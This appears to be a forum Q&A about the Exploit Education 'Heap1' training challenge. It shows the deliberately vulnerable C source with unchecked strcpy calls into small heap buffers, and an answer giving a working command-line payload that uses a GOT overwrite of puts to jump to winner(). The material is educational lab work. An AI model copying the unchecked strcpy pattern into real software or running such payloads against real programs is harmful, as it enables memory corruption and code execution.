# Heap overflow - strcpy() on x86_64 (64bit)

Tags: reverse-engineering, stack-overflow, heap-overflow

I'm stuck on the *Heap1*  challenge from [Exploit Education](https://exploit.education/protostar/heap-one/).

After compiling the source code in a **64bit** system,  without any security mechanism, I try to overflow the **heap** in order to overwrite the `main` return address on the stack to control the program flow to the `winner` function.

I can't overwrite on the stack with the `winner` function address. Some characters are trailing.

### Source

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}
```

### Problem

#### Finding `winner` address:

[image: Winner address]

#### Running payload

After crafting the **payload** and running the program I get a wrong value in the **return** address of `main` function.

[image: runing payload]

What am I doing wrong?

Comment: Can you copy/paste the text instead of adding screenshots? Especially for the python code you used

Comment: It would also help if you were more explicit about what you want to happen and what's happening instead.

Comment: This does not look like an overflow issue or a problem with the code. It appears to be a problem with how you are entering the addresses.

Answer (score 1):

### Solved

I solved this issue with the following command:

```
./heap1 "$(python -c "print 'A'*40+'\x20\x40\x40'")" $(python -c "print '\x62\x11\x40'")
```

The problem was the address I wanted to overwrite with was **3 bytes** of length and the original was **6 bytes** of length so, because `strcpy` function can't copy null characters I had to use the **GOT overwrite** method and use the `puts@got.plt` function address which did **fit** with the `winner` function **address**.

#### Notice double quoting

Using **GOT overwrite** method, I faced another **problem**. The `puts@got.plt` address was

```
0x404020
```

Which in **little endian** is

```
\x20\x40\x40
```

The character `\x20` in **ASCII** is the "<space>" character, so this made the first argument split in two parts. I fixed this surrounding it with double quotes.